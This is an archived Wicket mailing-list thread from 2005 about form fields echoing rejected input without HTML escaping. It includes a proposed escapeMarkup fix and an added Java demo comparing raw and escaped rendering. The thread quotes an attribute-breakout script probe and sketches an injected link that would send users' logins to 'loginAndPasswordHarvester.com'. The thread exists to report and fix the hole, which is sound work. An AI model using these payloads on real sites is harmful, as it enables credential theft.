This problem is not only a security problem, but also a bug:
Indeed, please go to the Wicket Examples (http://www.wicket-library.com/wicket-examples/index.html) and try this:
- enter this in the first textfield of the forminput example: My team's name is "Wicket's team"
- Then erase the value of the Integer textfield (in order to generate an invalid input).
- Submit the form
You can see that the form will not be correctly re-displayed (check the content of the String textfield).
The problem may be solved by replacing the FormComponent.getValue() method return statement:
return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : invalidInput;
by this one:
return NO_INVALID_INPUT.equals(invalidInput) ? getModelValue() : Strings.escapeMarkup(invalidInput);
(Please note that Component.getModelObjectAsString() HTML-escapes the value of the model.)
HTH,
--
Laurent
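As an added example that is not Laurent's patch or Wicket's own code: a stand-alone Java class whose escapeMarkup is a stand-in for Wicket's Strings.escapeMarkup (assumed to cover the same five characters). It renders the three values from this thread both raw and escaped, showing that escaping at render time keeps the model string exactly as typed while the attribute can no longer be broken out of.

```java
// Added example, not Wicket's own code: escapeMarkup below is a stand-in for
// Wicket's Strings.escapeMarkup (assumed to cover the same five characters).
public class AttributeEscapeDemo {

    // Escape the characters that can change meaning inside an HTML attribute
    // or element body; everything else passes through untouched.
    static String escapeMarkup(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // What the unpatched getValue() path produces: the rejected input goes into
    // the attribute verbatim, so a '"' in it closes value="..." early.
    static String renderUnsafe(String value) {
        return "<input type=\"text\" value=\"" + value + "\">";
    }

    // Laurent's fix, applied at render time: the String itself is left exactly
    // as typed (the model never holds entities), only the markup is escaped.
    static String renderSafe(String value) {
        return "<input type=\"text\" value=\"" + escapeMarkup(value) + "\">";
    }

    public static void main(String[] args) {
        String[] inputs = {
            "x = 6 < 7 & 10 > 5",                          // Johan's ordinary value
            "My team's name is \"Wicket's team\"",          // Laurent's forminput case
            "\"><script>alert('Soylent Green Is People');</script test=" // Johannes's probe
        };
        for (String in : inputs) {
            System.out.println("model value: " + in);
            System.out.println("unsafe     : " + renderUnsafe(in));
            System.out.println("safe       : " + renderSafe(in));
            System.out.println();
        }
    }
}
```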
On 11/24/05, Johannes Fahrenkrug <[EMAIL PROTECTED]> wrote:
Johan Compagner wrote:
> so when i have this:
>
> x = 6 < 7 & 10 > 5
>
> as text in my model it gets encoded into html? (And that's what I see?)
> That is something I don't want.
No, I think this would be the right thing to do:
the value of the model is x = 6 < 7 & 10 > 5
but as soon as wicket renders the page and the value of the input field
that the model is attached to,
it should render the value as x = 6 &lt; 7 &amp; 10 &gt; 5
so that the html source will read
<input type="text" value="x = 6 &lt; 7 &amp; 10 &gt; 5">
instead of
<input type="text" value="x = 6 < 7 & 10 > 5">
special chars should only be RENDERED as html entities, not saved as
html entities in the model.
>
> The problem you describe is, I think, the " at the beginning that makes
> it all possible
> (else it was just a text value of the value attribute).
the " makes it possible to break out of the value parameter of the input
field. That could pose a security risk, though.
Imagine this: You have a login form that saves the username in case the
login failed and the page is reloaded.
Some malicious person opens the login page and enters this:
"
href="">http://loginAndPasswordHarvester.com'
dummy="
He sends off the form, it gets reloaded because the "login" is invalid
and he leaves the terminal for someone else to login.
When someone else tries to log in, their username and password get sent
to a different server.
So I guess rendering special characters as html entities might be a good
idea.
Cheers,
Johannes.
>
> johan
>
>
> On 11/24/05, *Johannes Fahrenkrug* <[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>> wrote:
>
> Hi,
>
> I have built several forms using Wicket. Just out of curiosity I
> tried
> to enter the following line into a text field:
>
> "><script>alert('Soylent Green Is People');</script test="
>
> When I reload the form, the JavaScript code gets executed. Shouldn't
> such special characters be converted to HTML entities when the
> page gets
> parsed? (You know &lt; instead of < and so forth)
>
> Cheers,
>
> Johannes.
>
>
> _______________________________________________
> Wicket-user mailing list
> [email protected]
> <mailto:[email protected]>
> https://lists.sourceforge.net/lists/listinfo/wicket-user
